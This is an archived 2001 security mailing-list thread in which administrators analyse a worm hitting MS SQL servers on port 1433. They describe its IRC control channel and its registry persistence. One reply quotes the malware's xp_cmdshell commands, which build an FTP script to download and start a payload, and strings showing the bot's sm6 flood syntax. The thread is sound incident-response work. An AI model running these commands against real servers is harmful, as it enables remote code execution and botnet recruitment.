Hi All, Analysed it a bit further (thanks to VMware and netmonitor) and once it is started it connects to an irc server at bots.kujikiri.net, port 6669. From the rest of the capture it seems it drops a message there with the name of the machine it compromised and a password like string. It furthermore (see strings output on executable, scan for registry keys) adds itself to the Run entry in the registry so it is started each time the machine is booted. A few of the registry keys: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY From the strings output it seems to contain a scanner (sm6 ..) that will scan for new vulnerable machines. I'm not quite sure if and so, how, it is controlled from the IRC channel. I've tested it on our testing network so I'm not quite sure yet. I've attached the netmon capture file to this message. grtz, Arthur On Tue, 20 Nov 2001, Paul Nasrat wrote: > On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote: > > > > We saw a scan come in looking for systems answering on 1433, and > > immediately saw several systems start scanning out for other systems > > answering on 1433 - worm behavior? Has anyone else seen this? > > No, but the binaries it downloads: > > win32mon.exe and dnsservice.exe > > Are on the ftp site in the dump. I don't have a windows debugger to put > them through but they look interesting: > > exec xp_cmdshell 'start dnsservice.exe' > exec xp_cmdshell 'del ftp.x' > exec xp_cmdshell 'ftp -s:ftp.x > exec xp_cmdshell 'echo quit >> ftp.x' > exec xp_cmdshell 'echo close >> ftp.x' > exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' > exec xp_cmdshell 'echo cd tmp>> ftp.x' > exec xp_cmdshell 'echo cd pub>> ftp.x' > exec xp_cmdshell 'echo bin>> ftp.x' > exec xp_cmdshell 'echo foo.com>> ftp.x' > exec xp_cmdshell 'echo ftp> ftp.x' > > GET /%s HTTP/1.0 > Connection: Keep-Alive > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) > [GET] - Unable to connect to http. > [GET] - Unable to resolve host. > http:// > [GET] - Unable to create new socket. > GET <bot|wildcard> <host> <save as> > %s %s %s %s > NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) > NICK %s > NOTICE %s :Nick cannot be larger than 9 characters. > NOTICE %s :NICK <nick> > sm6 has finished... > with tcp/syn boost! > sm6 icmp/udp has begun... > sm6 icmp/udp (w/pkt-push!) has begun.. > Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src > port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t > include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> > > etc. > > Paul Nasrat > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com >
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 10:52:25 PST